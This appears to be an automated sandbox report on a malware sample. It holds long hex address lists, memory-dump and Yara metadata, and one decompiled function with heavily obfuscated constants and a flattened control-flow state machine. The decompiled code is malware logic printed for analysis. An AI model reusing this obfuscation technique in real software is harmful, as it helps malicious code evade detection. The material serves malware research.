                          0x001da6ea
                          0x001da6ef
                          0x001da6f7
                          0x001da702
                          0x001da70a
                          0x001da717
                          0x001da722
                          0x001da738
                          0x001da743
                          0x001da74e
                          0x001da756
                          0x001da761
                          0x001da76f
                          0x001da774
                          0x001da77d
                          0x001da788
                          0x001da793
                          0x001da79b
                          0x001da7a3
                          0x001da7ab
                          0x001da7b3
                          0x001da7bb
                          0x001da7c6
                          0x001da7d1
                          0x001da7dc
                          0x001da7e7
                          0x001da7f2
                          0x001da7fd
                          0x001da808
                          0x001da813
                          0x001da81b
                          0x001da81e
                          0x001da825
                          0x001da830
                          0x001da83b
                          0x001da846
                          0x001da851
                          0x001da85c
                          0x001da864
                          0x001da86c
                          0x001da874
                          0x001da87c
                          0x001da884
                          0x001da88f
                          0x001da89a
                          0x001da8a2
                          0x001da8ad
                          0x001da8c3
                          0x001da8ca
                          0x001da8d5
                          0x001da8e8
                          0x001da8e9
                          0x001da8f0
                          0x001da8fb
                          0x001da906
                          0x001da90d
                          0x001da918
                          0x001da923
                          0x001da937
                          0x001da93e
                          0x001da949
                          0x001da954
                          0x001da95f
                          0x001da96a
                          0x001da972
                          0x001da97f
                          0x001da983
                          0x001da98b
                          0x001da993
                          0x001da99e
                          0x001da9a8
                          0x001da9b3
                          0x001da9be
                          0x001da9c9
                          0x001da9d4
                          0x001da9df
                          0x001da9ea
                          0x001da9f5
                          0x001daa00
                          0x001daa0b
                          0x001daa16
                          0x001daa1e
                          0x001daa26
                          0x001daa31
                          0x001daa39
                          0x001daa3e
                          0x001daa46
                          0x001daa4e
                          0x001daa56
                          0x001daa64
                          0x001daa67
                          0x001daa6b
                          0x001daa73
                          0x001daa7b
                          0x001daa83
                          0x001daa8e
                          0x001daa96
                          0x001daaa1
                          0x001daaac
                          0x001daabf
                          0x001daac6
                          0x001daad1
                          0x001daad9
                          0x001daae1
                          0x001daae6
                          0x001daaea
                          0x001daaf2
                          0x001daafa
                          0x001dab0d
                          0x001dab14
                          0x001dab1f
                          0x001dab32
                          0x001dab39
                          0x001dab41
                          0x001dab4c
                          0x001dab57
                          0x001dab67
                          0x001dab6e
                          0x001dab79
                          0x001dab81
                          0x001dab86
                          0x001dab8b
                          0x001dab90
                          0x001dab98
                          0x001daba0
                          0x001daba8
                          0x001dabb0
                          0x001dabb8
                          0x001dabc0
                          0x001dabcb
                          0x001dabd3
                          0x001dabde
                          0x001dabe9
                          0x001dabf4
                          0x001dabff
                          0x001dac0a
                          0x001dac12
                          0x001dac1a
                          0x001dac22
                          0x001dac2a
                          0x001dac35
                          0x001dac3d
                          0x001dac48
                          0x001dac53
                          0x001dac58
                          0x001dac63
                          0x001dac68
                          0x001dac73
                          0x001dac7b
                          0x001dac80
                          0x001dac88
                          0x001dac8d
                          0x001dac95
                          0x001dac9d
                          0x001daca5
                          0x001dacaa
                          0x001dacb2
                          0x001dacba
                          0x001daccd
                          0x001dacd4
                          0x001dacdf
                          0x001dacea
                          0x001dacf5
                          0x001dad00
                          0x001dad0b
                          0x001dad0b
                          0x001dad10
                          0x001dad10
                          0x001dad10
                          0x001dad15
                          0x001dad15
                          0x001dad15
                          0x001dad1a
                          0x001dad1a
                          0x001dad1a
                          0x001dad1a
                          0x001dad20
                          0x00000000
                          0x00000000
                          0x001dad26
                          0x001daebc
                          0x001daec5
                          0x001daed0
                          0x001daed5
                          0x001daee3
                          0x001daf2b
                          0x001daf3b
                          0x001daf4a
                          0x001daf6a
                          0x001daf6f
                          0x001daf72
                          0x00000000
                          0x001dad2c
                          0x001dad32
                          0x001daeaf
                          0x001daeb5
                          0x00000000
                          0x001dad38
                          0x001dad3e
                          0x001dae93
                          0x00000000
                          0x001dad44
                          0x001dad4a
                          0x001dade7
                          0x001dadf0
                          0x001dadfe
                          0x001dae04
                          0x001dae62
                          0x001dae70
                          0x001dae70
                          0x001dae81
                          0x001dae86
                          0x001dae89
                          0x001dae89
                          0x001db08e
                          0x001db08e
                          0x001db093
                          0x001db098
                          0x00000000
                          0x001dad50
                          0x001dad56
                          0x001dadd5
                          0x001dadda
                          0x001daddd
                          0x001dad0b
                          0x001dad0b
                          0x00000000
                          0x001dad0b
                          0x001dad58
                          0x001dad5a
                          0x00000000
                          0x001dad60
                          0x001dad95
                          0x001dad9c
                          0x001dadad
                          0x001dad0b
                          0x001dad0b
                          0x001dad10
                          0x001dad10
                          0x001dad15
                          0x001dad15
                          0x00000000
                          0x001dad15
                          0x001dad0b
                          0x001dad5a
                          0x001dad56
                          0x001dad4a
                          0x001dad3e
                          0x001dad32
                          0x001db0d5
                          0x001db0df
                          0x001db0df
                          0x001daf7c
                          0x001daf7e
                          0x001db070
                          0x001db081
                          0x001db084
                          0x001db089
                          0x001db08b
                          0x00000000
                          0x001daf84
                          0x001daf84
                          0x001daf86
                          0x001db021
                          0x001db028
                          0x001db034
                          0x001db036
                          0x001db03b
                          0x00000000
                          0x001daf88
                          0x001daf88
                          0x001daf8a
                          0x001db0cb
                          0x001daf90
                          0x001daf90
                          0x001daf92
                          0x00000000
                          0x001daf98
                          0x001dafb1
                          0x001dafb2
                          0x001dafba
                          0x001dafbf
                          0x001dafc2
                          0x001dafc9
                          0x001dafcd
                          0x001dafd2
                          0x001dafd7
                          0x00000000
                          0x001dafd7
                          0x001daf92
                          0x001daf8a
                          0x001daf86
                          0x00000000
                          0x001db09d
                          0x001db09d
                          0x001db09d
                          0x00000000
                          0x001db0a9
                          0x001dad15
                          0x001dad10

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6[$?!a>$BbQ$ECx$JAzr$P`$P`$Qw6$SY)$[($mO=T$u$w=$xw$zr$zr$<
                          • API String ID: 0-1031985829
                          • Opcode ID: dd862bae9c94b7860566892bbb833bb644a7d3a3d03612be1803e9aaab091866
                          • Instruction ID: fdcedff2b0a8ed7e86c2d3630f6d7bdffd1ec4464fd51251e48d84aefb029ba2
                          • Opcode Fuzzy Hash: dd862bae9c94b7860566892bbb833bb644a7d3a3d03612be1803e9aaab091866
                          • Instruction Fuzzy Hash: 4862FF715083809FD7B9CF61C58AB8FBBE2BBD4704F10891DE29A96260D7B18949DF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001E0370, Relevance: 19.4, Strings: 15, Instructions: 644COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001E0370(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int* _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t729;
				void* _t731;
				signed int _t734;
				signed int _t754;
				signed int _t757;
				signed int* _t760;
				void* _t818;
				signed int _t821;
				signed int _t832;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t856;
				signed int _t861;
				signed int* _t864;
				void* _t867;
				void* _t873;

				_t873 = __fp0;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_v204 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12 & 0x0000ffff);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_a12 & 0x0000ffff);
				_v264 = 0x3bf2ba;
				_t864 =  &(( &_v264)[0xd]);
				_v264 = _v264 ^ 0xf9dcdfeb;
				_v264 = _v264 | 0xcf286d43;
				_t757 = 0;
				_v264 = _v264 + 0x2f6b;
				_t854 = 0xb0ddf6c;
				_v264 = _v264 ^ 0xffef9cbe;
				_v12 = 0x619986;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x86661813;
				_v64 = 0xacc813;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0002b3e8;
				_v56 = 0x16558c;
				_v56 = _v56 ^ 0x21def54d;
				_v56 = _v56 ^ 0x21c820c1;
				_v152 = 0x7852c;
				_v8 = 0;
				_t840 = 0x45;
				_v152 = _v152 / _t840;
				_v152 = _v152 / _t840;
				_v152 = _v152 ^ 0x00004067;
				_v168 = 0xfd93da;
				_v168 = _v168 + 0xffff8b1c;
				_v168 = _v168 << 0xb;
				_v168 = _v168 ^ 0xe8b7b000;
				_v224 = 0x659efc;
				_v224 = _v224 << 0xb;
				_v224 = _v224 ^ 0x7bc67180;
				_v224 = _v224 + 0xd5f9;
				_v224 = _v224 ^ 0x57366779;
				_v200 = 0xc43b1;
				_v200 = _v200 >> 7;
				_v200 = _v200 << 8;
				_v200 = _v200 >> 0xb;
				_v200 = _v200 ^ 0x04000310;
				_v232 = 0x288315;
				_v232 = _v232 << 0xd;
				_v232 = _v232 + 0x4c8e;
				_t841 = 0x5b;
				_v232 = _v232 / _t841;
				_v232 = _v232 ^ 0x0026191a;
				_v164 = 0x619644;
				_v164 = _v164 >> 1;
				_v164 = _v164 >> 9;
				_v164 = _v164 ^ 0x00001a65;
				_v32 = 0x9f01f9;
				_v32 = _v32 ^ 0xa48b040e;
				_v32 = _v32 ^ 0xa41404f7;
				_v176 = 0xac1aac;
				_t842 = 0x49;
				_v176 = _v176 / _t842;
				_v176 = _v176 + 0xffffa10e;
				_v176 = _v176 << 0xc;
				_v176 = _v176 ^ 0x9fc99000;
				_v40 = 0xb8c84b;
				_t843 = 0x73;
				_v40 = _v40 / _t843;
				_v40 = _v40 ^ 0x00019b57;
				_v244 = 0xf40d36;
				_t844 = 0x6b;
				_v244 = _v244 * 0x62;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 + 0xffffdda4;
				_v244 = _v244 ^ 0x00015319;
				_v228 = 0x789122;
				_v228 = _v228 + 0x7600;
				_v228 = _v228 ^ 0x06415a1a;
				_v228 = _v228 * 0x1a;
				_v228 = _v228 ^ 0xa1b977af;
				_v28 = 0xb5334d;
				_v28 = _v28 | 0x64adaea9;
				_v28 = _v28 ^ 0x64bdbff2;
				_v88 = 0x600bd7;
				_v88 = _v88 | 0x9bc31fbe;
				_v88 = _v88 ^ 0x9be31ffc;
				_v44 = 0xe4c8a4;
				_v44 = _v44 ^ 0x077e80f3;
				_v44 = _v44 ^ 0x079a4957;
				_v264 = 0x57efac;
				_v264 = _v264 >> 0xe;
				_v264 = _v264 * 0x53;
				_v264 = _v264 | 0x8853ee8b;
				_v264 = _v264 ^ 0x885ceb95;
				_v256 = 0xdaa3cd;
				_v256 = _v256 * 0x3c;
				_v256 = _v256 + 0xffffaf53;
				_v256 = _v256 ^ 0x333718c5;
				_v264 = 0x8cc3a4;
				_v264 = _v264 >> 0xd;
				_v264 = _v264 << 7;
				_v264 = _v264 >> 0xf;
				_v264 = _v264 ^ 0x00039b25;
				_v264 = 0x91c455;
				_v264 = _v264 << 8;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 + 0xffffe696;
				_v264 = _v264 ^ 0x00055627;
				_v264 = 0xb8ce41;
				_v264 = _v264 / _t844;
				_v264 = _v264 | 0x92ffd4ff;
				_v264 = _v264 ^ 0x92f6d31d;
				_v264 = 0xfb8d54;
				_v264 = _v264 * 0x4c;
				_v264 = _v264 + 0xfffffc37;
				_v264 = _v264 << 0xd;
				_v264 = _v264 ^ 0xbe2f3023;
				_v260 = 0x8d0500;
				_v260 = _v260 + 0x8ef7;
				_v260 = _v260 ^ 0x008a8944;
				_v260 = 0x9b4ebc;
				_v260 = _v260 | 0x9f300090;
				_v260 = _v260 ^ 0x9fbf2fd3;
				_v260 = 0xb11a34;
				_v260 = _v260 + 0xffff397e;
				_v260 = _v260 ^ 0x00bda5bc;
				_v260 = 0xda4006;
				_v260 = _v260 + 0xffff2350;
				_v260 = _v260 ^ 0x00df924b;
				_v260 = 0xfa264;
				_v260 = _v260 | 0xe03386ab;
				_v260 = _v260 ^ 0xe03becb8;
				_v260 = 0x36c206;
				_t861 = 0x7e;
				_t845 = 0x4e;
				_v260 = _v260 * 0x53;
				_v260 = _v260 ^ 0x11c21e2e;
				_v264 = 0xeb8ad6;
				_v264 = _v264 + 0xffffff14;
				_v264 = _v264 | 0xa4e49e57;
				_v264 = _v264 * 0x31;
				_v264 = _v264 ^ 0x91df8148;
				_v260 = 0x49e4dc;
				_v260 = _v260 | 0x32361d08;
				_v260 = _v260 ^ 0x32798df6;
				_v148 = 0xdedd33;
				_v148 = _v148 + 0x20c1;
				_v148 = _v148 ^ 0xf511dd0a;
				_v148 = _v148 ^ 0xf5cc8216;
				_v172 = 0x4e325e;
				_v172 = _v172 + 0x69f5;
				_v172 = _v172 << 8;
				_v172 = _v172 / _t861;
				_v172 = _v172 ^ 0x0098c5bf;
				_v132 = 0x56f111;
				_v132 = _v132 / _t845;
				_v132 = _v132 + 0xffff6d40;
				_v132 = _v132 ^ 0x000c7fcf;
				_v108 = 0x564a26;
				_v108 = _v108 ^ 0x5ac3ed89;
				_v108 = _v108 ^ 0x5a9ae1e1;
				_v208 = 0x713a4f;
				_v208 = _v208 >> 9;
				_v208 = _v208 << 4;
				_v208 = _v208 + 0xffff8e7c;
				_v208 = _v208 ^ 0x0001aef6;
				_v72 = 0xa78a5a;
				_v72 = _v72 ^ 0x21ab4a2c;
				_v72 = _v72 ^ 0x210ed8c8;
				_v156 = 0x8eec2a;
				_t846 = 0x1d;
				_v156 = _v156 / _t846;
				_v156 = _v156 | 0xe8d7ca9f;
				_v156 = _v156 ^ 0xe8db3425;
				_v216 = 0xbe7af4;
				_v216 = _v216 + 0x62f0;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 << 4;
				_v216 = _v216 ^ 0x000ca62c;
				_v112 = 0x5cddf;
				_v112 = _v112 + 0xffff7278;
				_v112 = _v112 << 5;
				_v112 = _v112 ^ 0x00ac458e;
				_v124 = 0xf4fe4a;
				_v124 = _v124 * 0x23;
				_v124 = _v124 + 0xffffa4ee;
				_v124 = _v124 ^ 0x217d925b;
				_v120 = 0x4295e2;
				_v120 = _v120 >> 0xc;
				_v120 = _v120 + 0xffffbc18;
				_v120 = _v120 ^ 0xfffbc35b;
				_v140 = 0x4e8e05;
				_t847 = 0x53;
				_v140 = _v140 * 7;
				_t848 = 0x2a;
				_v140 = _v140 / _t847;
				_v140 = _v140 ^ 0x000d3014;
				_v116 = 0x219afb;
				_v116 = _v116 ^ 0x1bb70309;
				_v116 = _v116 + 0x9cdb;
				_v116 = _v116 ^ 0x1b9e374a;
				_v240 = 0x7e790f;
				_v240 = _v240 >> 4;
				_v240 = _v240 | 0xdc4d67aa;
				_v240 = _v240 * 0x7d;
				_v240 = _v240 ^ 0x93030bed;
				_v144 = 0x893e76;
				_v144 = _v144 | 0x7cc55deb;
				_v144 = _v144 ^ 0x7cc15b6f;
				_v252 = 0x6ec0a5;
				_v252 = _v252 + 0xffff0e3e;
				_v252 = _v252 << 8;
				_v252 = _v252 + 0xad95;
				_v252 = _v252 ^ 0x6dc2e551;
				_v184 = 0xc9b8e5;
				_v184 = _v184 | 0x25333614;
				_v184 = _v184 + 0xffffa467;
				_v184 = _v184 + 0xffffd31f;
				_v184 = _v184 ^ 0x25f0dab7;
				_v100 = 0xa8adeb;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x2b73a17b;
				_v104 = 0xbfbcb8;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0x2fed78ee;
				_v76 = 0x79d50b;
				_v76 = _v76 + 0x9ff3;
				_v76 = _v76 ^ 0x007a052c;
				_v84 = 0x8f07c2;
				_t849 = 0xa;
				_v84 = _v84 / _t848;
				_v84 = _v84 ^ 0x00081a14;
				_v192 = 0x8fd6fb;
				_v192 = _v192 >> 0x10;
				_v192 = _v192 * 0x2d;
				_v192 = _v192 >> 0xb;
				_v192 = _v192 ^ 0x000533d4;
				_v92 = 0xf2e29d;
				_v92 = _v92 | 0xa8510241;
				_v92 = _v92 ^ 0xa8f24903;
				_v136 = 0x3fc77e;
				_t850 = 6;
				_v136 = _v136 / _t849;
				_v136 = _v136 + 0xf8ad;
				_v136 = _v136 ^ 0x000c94bb;
				_v248 = 0x1d2dee;
				_v248 = _v248 + 0xffffe467;
				_v248 = _v248 + 0xfffffb55;
				_v248 = _v248 << 7;
				_v248 = _v248 ^ 0x0e846fd7;
				_v68 = 0x7275c5;
				_v68 = _v68 / _t850;
				_v68 = _v68 ^ 0x00138ff1;
				_v52 = 0xbd953f;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x002d867c;
				_v236 = 0x6c390e;
				_v236 = _v236 | 0x8341dc77;
				_v236 = _v236 ^ 0x9f2553b7;
				_v236 = _v236 + 0xc284;
				_v236 = _v236 ^ 0x1c443a9e;
				_v60 = 0xe4b226;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x0000e4f8;
				_v128 = 0x8a2f41;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0xa906698d;
				_v128 = _v128 ^ 0xa90fd0dd;
				_v260 = 0xb373e3;
				_t851 = 0x65;
				_v260 = _v260 * 0x5f;
				_v260 = _v260 ^ 0x4290d33f;
				_v212 = 0xc00726;
				_v212 = _v212 << 6;
				_v212 = _v212 + 0x64e5;
				_v212 = _v212 | 0x0a7365f4;
				_v212 = _v212 ^ 0x3a7366b9;
				_v220 = 0x4514f3;
				_v220 = _v220 * 0x17;
				_v220 = _v220 + 0x1d0d;
				_v220 = _v220 << 4;
				_v220 = _v220 ^ 0x63443f4d;
				_v160 = 0x303aac;
				_v160 = _v160 ^ 0x719995e8;
				_v160 = _v160 + 0xf6a4;
				_v160 = _v160 ^ 0x71ae9bf2;
				_v48 = 0x662090;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0396166a;
				_v96 = 0xa68bea;
				_v96 = _v96 + 0xffff38d0;
				_v96 = _v96 ^ 0x00a728da;
				_v180 = 0xd187dd;
				_v180 = _v180 / _t851;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0x0000146e;
				_v16 = 0x8b1f34;
				_v16 = _v16 + 0xffff45ca;
				_v16 = _v16 ^ 0x008aa47f;
				_v188 = 0xe35e5d;
				_v188 = _v188 + 0xdaf8;
				_v188 = _v188 | 0x67ffa7ad;
				_v188 = _v188 ^ 0x67f62311;
				_v24 = 0x5198a7;
				_v24 = _v24 ^ 0xd802f8d6;
				_v24 = _v24 ^ 0xd85bf2b2;
				_v20 = 0xe5d36f;
				_t852 = 0x7c;
				_v20 = _v20 / _t852;
				_v20 = _v20 ^ 0x00092876;
				_v80 = 0x923b59;
				_v80 = _v80 + 0xffffec13;
				_v80 = _v80 ^ 0x009b959b;
				_v264 = 0x6b0706;
				_v264 = _v264 * 0x43;
				_v264 = _v264 / _t861;
				_v264 = _v264 ^ 0xb16e0b4f;
				_v264 = _v264 ^ 0xb15e7c25;
				_v256 = 0x8513f5;
				_v256 = _v256 | 0xdf3fff5a;
				_v256 = _v256 ^ 0xdfb067f3;
				_t862 = _v4;
				_t853 = _v4;
				while(1) {
					L1:
					while(1) {
						_t729 = _v196;
						while(1) {
							L3:
							_t867 = _t854 - 0xaef784f;
							if(_t867 > 0) {
								break;
							}
							if(_t867 == 0) {
								E001C1934(_t757, _v188, _v24, _t853, _t854, _t873, _t853);
								L21:
								_t854 = 0x772bc2f;
								L13:
								_t760 = _v204;
								goto L1;
							}
							if(_t854 == 0x5ee6bd) {
								_push(_v120);
								_t729 = E001D2621(_t862, _v156, _a12, _a40, _v216, _t760, _v88, _v112, _v124);
								_t760 = _v204;
								_t864 = _t864 - 0xc + 0x2c;
								__eflags = _t729;
								_v196 = _t729;
								_t818 = 0xc6135b8;
								_t854 =  !=  ? 0xc6135b8 : 0x809a129;
								continue;
							}
							if(_t854 == 0x44fc0cb) {
								_t854 = 0xcfaad0f;
								continue;
							}
							if(_t854 == 0x586e335) {
								_t734 =  *_t760;
								__eflags = _t734;
								if(_t734 == 0) {
									_t821 = 0;
									__eflags = 0;
								} else {
									_t821 = _t760[1];
								}
								E001C30A2(_v160, _t821, _t760, _a32, _t734, _v48, _v96, _v180, _t853, _v16);
								_t864 =  &(_t864[8]);
								asm("sbb esi, esi");
								_t854 = (_t854 & 0x01d169f5) + 0xaef784f;
								goto L13;
							}
							if(_t854 == 0x772bc2f) {
								_t598 =  &_v20; // 0x92876
								E001C1934(_t757,  *_t598, _v80, _t853, _t854, _t873, _t729);
								_t854 = 0x809a129;
								goto L13;
							}
							if(_t854 != 0x809a129) {
								L41:
								__eflags = _t854 - 0xeaf6d2a;
								if(_t854 == 0xeaf6d2a) {
									L11:
									return _t757;
								}
								_t729 = _v196;
								continue;
							}
							E001C1934(_t757, _v264, _v256, _t853, _t854, _t873, _t862);
							goto L11;
						}
						__eflags = _t854 - 0xb000863;
						if(_t854 == 0xb000863) {
							__eflags = E001C2CC2(_t853, _a24);
							_t854 = 0xaef784f;
							_t731 = 1;
							_t757 =  !=  ? _t731 : _t757;
							L40:
							_t760 = _v204;
							_t818 = 0xc6135b8;
							goto L41;
						}
						__eflags = _t854 - 0xb0ddf6c;
						if(_t854 == 0xb0ddf6c) {
							_t854 = 0x44fc0cb;
							goto L3;
						}
						__eflags = _t854 - _t818;
						if(_t854 == _t818) {
							__eflags =  *_t760;
							if(__eflags == 0) {
								_t739 = _v8;
							} else {
								_push(_v240);
								_push(_v116);
								_v8 = E001DCD35(0x1c1188, _v140, __eflags);
							}
							_t832 = _v176 | _v32 | _v164 | _v232 | _v200 | _v224 | _v168 | _v152 | _v56;
							_t856 = _a16 & 1;
							__eflags = _t856;
							if(_t856 != 0) {
								__eflags = _t832;
							}
							_push(1);
							_push(_v104);
							_push(1);
							_push(_v100);
							_t853 = E001D9FF7(_t739, _t832, _v196, _v144, 1, _v252, 1, _a28, _v184);
							_t654 =  &_v76; // 0x92876
							E001D629F( *_t654, _v8, _v84, _v192, _v92);
							_t864 =  &(_t864[0xe]);
							__eflags = _t853;
							if(_t853 == 0) {
								goto L21;
							} else {
								_v36 = 1;
								E001C71F1(_v136, _t853, _v244, _v248,  &_v36, 4, _v68);
								_t864 =  &(_t864[5]);
								__eflags = _t856;
								if(_t856 != 0) {
									E001DDE84(_v228, _v52, _t853,  &_v4, _v236, _v60,  &_v36, _v128);
									_t670 =  &_v36;
									 *_t670 = _v36 | _v44;
									__eflags =  *_t670;
									E001C71F1(_v260, _t853, _v28, _v212,  &_v36, _v4, _v220);
									_t864 =  &(_t864[0xb]);
								}
								_t854 = 0x586e335;
								goto L13;
							}
						}
						__eflags = _t854 - 0xcc0e244;
						if(__eflags == 0) {
							__eflags = E001D26F9(_t853, _v12, __eflags) - _v64;
							_t854 =  ==  ? 0xb000863 : 0xaef784f;
							goto L13;
						}
						__eflags = _t854 - 0xcfaad0f;
						if(_t854 != 0xcfaad0f) {
							goto L41;
						}
						_t754 = E001C70AE(_v148, _v172, _t760, _v40, _t760, _t760, _v132, _v108);
						_t862 = _t754;
						__eflags = _t754;
						_t854 =  !=  ? 0x5ee6bd : 0xeaf6d2a;
						E001CAE43(0, _v208, _v72);
						_t864 =  &(_t864[8]);
						goto L40;
					}
				}
			}





































































































                          0x001e0370
                          0x001e037a
                          0x001e0388
                          0x001e0392
                          0x001e0399
                          0x001e039d
                          0x001e03a4
                          0x001e03ab
                          0x001e03b2
                          0x001e03b9
                          0x001e03c0
                          0x001e03c1
                          0x001e03c8
                          0x001e03cf
                          0x001e03d0
                          0x001e03d1
                          0x001e03d6
                          0x001e03de
                          0x001e03e1
                          0x001e03eb
                          0x001e03f3
                          0x001e03f5
                          0x001e03fd
                          0x001e0402
                          0x001e040a
                          0x001e0415
                          0x001e041d
                          0x001e0428
                          0x001e0433
                          0x001e043b
                          0x001e0446
                          0x001e0451
                          0x001e045c
                          0x001e0467
                          0x001e047b
                          0x001e0482
                          0x001e0487
                          0x001e0499
                          0x001e04a2
                          0x001e04ad
                          0x001e04b5
                          0x001e04bd
                          0x001e04c2
                          0x001e04ca
                          0x001e04d2
                          0x001e04d7
                          0x001e04df
                          0x001e04e7
                          0x001e04ef
                          0x001e04f7
                          0x001e04fc
                          0x001e0501
                          0x001e0506
                          0x001e050e
                          0x001e0516
                          0x001e051b
                          0x001e0527
                          0x001e052a
                          0x001e052e
                          0x001e0536
                          0x001e053e
                          0x001e0542
                          0x001e0547
                          0x001e054f
                          0x001e055a
                          0x001e0565
                          0x001e0572
                          0x001e0580
                          0x001e0585
                          0x001e058b
                          0x001e0593
                          0x001e0598
                          0x001e05a0
                          0x001e05b2
                          0x001e05b7
                          0x001e05c0
                          0x001e05cb
                          0x001e05d8
                          0x001e05d9
                          0x001e05dd
                          0x001e05e2
                          0x001e05ea
                          0x001e05f2
                          0x001e05fa
                          0x001e0602
                          0x001e060f
                          0x001e0613
                          0x001e061b
                          0x001e0626
                          0x001e0631
                          0x001e063c
                          0x001e0647
                          0x001e0652
                          0x001e065d
                          0x001e0668
                          0x001e0673
                          0x001e067e
                          0x001e0686
                          0x001e0690
                          0x001e0694
                          0x001e069c
                          0x001e06a4
                          0x001e06b1
                          0x001e06b5
                          0x001e06bd
                          0x001e06c5
                          0x001e06cd
                          0x001e06d2
                          0x001e06d7
                          0x001e06dc
                          0x001e06e4
                          0x001e06ec
                          0x001e06f1
                          0x001e06f6
                          0x001e06fe
                          0x001e0706
                          0x001e0714
                          0x001e0718
                          0x001e0720
                          0x001e0728
                          0x001e0735
                          0x001e0739
                          0x001e0741
                          0x001e0746
                          0x001e074e
                          0x001e0756
                          0x001e075e
                          0x001e0766
                          0x001e076e
                          0x001e0776
                          0x001e0780
                          0x001e0788
                          0x001e0790
                          0x001e0798
                          0x001e07a0
                          0x001e07a8
                          0x001e07b0
                          0x001e07b8
                          0x001e07c0
                          0x001e07c8
                          0x001e07d7
                          0x001e07da
                          0x001e07db
                          0x001e07df
                          0x001e07e7
                          0x001e07ef
                          0x001e07f7
                          0x001e0806
                          0x001e080a
                          0x001e0812
                          0x001e081a
                          0x001e0822
                          0x001e082a
                          0x001e0835
                          0x001e0840
                          0x001e084b
                          0x001e0856
                          0x001e085e
                          0x001e0866
                          0x001e0873
                          0x001e0877
                          0x001e087f
                          0x001e0895
                          0x001e089c
                          0x001e08a7
                          0x001e08b2
                          0x001e08bd
                          0x001e08c8
                          0x001e08d3
                          0x001e08db
                          0x001e08e0
                          0x001e08e5
                          0x001e08ed
                          0x001e08f5
                          0x001e0900
                          0x001e090b
                          0x001e0916
                          0x001e0928
                          0x001e092b
                          0x001e092f
                          0x001e0937
                          0x001e093f
                          0x001e0947
                          0x001e094f
                          0x001e0954
                          0x001e0959
                          0x001e0961
                          0x001e096c
                          0x001e0977
                          0x001e097f
                          0x001e098a
                          0x001e099d
                          0x001e09a4
                          0x001e09af
                          0x001e09ba
                          0x001e09c5
                          0x001e09cf
                          0x001e09da
                          0x001e09e5
                          0x001e09fa
                          0x001e09fd
                          0x001e0a0d
                          0x001e0a0e
                          0x001e0a17
                          0x001e0a22
                          0x001e0a2d
                          0x001e0a38
                          0x001e0a43
                          0x001e0a4e
                          0x001e0a56
                          0x001e0a5b
                          0x001e0a6a
                          0x001e0a6e
                          0x001e0a76
                          0x001e0a81
                          0x001e0a8c
                          0x001e0a97
                          0x001e0a9f
                          0x001e0aa7
                          0x001e0aac
                          0x001e0ab4
                          0x001e0abc
                          0x001e0ac4
                          0x001e0acc
                          0x001e0ad4
                          0x001e0adc
                          0x001e0ae4
                          0x001e0aef
                          0x001e0af7
                          0x001e0b02
                          0x001e0b0d
                          0x001e0b15
                          0x001e0b20
                          0x001e0b2b
                          0x001e0b36
                          0x001e0b41
                          0x001e0b55
                          0x001e0b56
                          0x001e0b5f
                          0x001e0b6a
                          0x001e0b72
                          0x001e0b7e
                          0x001e0b82
                          0x001e0b87
                          0x001e0b8f
                          0x001e0b9a
                          0x001e0ba5
                          0x001e0bb0
                          0x001e0bc4
                          0x001e0bc5
                          0x001e0bcc
                          0x001e0bd7
                          0x001e0be2
                          0x001e0bea
                          0x001e0bf2
                          0x001e0bfa
                          0x001e0bff
                          0x001e0c09
                          0x001e0c1f
                          0x001e0c26
                          0x001e0c31
                          0x001e0c3c
                          0x001e0c44
                          0x001e0c4f
                          0x001e0c57
                          0x001e0c5f
                          0x001e0c67
                          0x001e0c6f
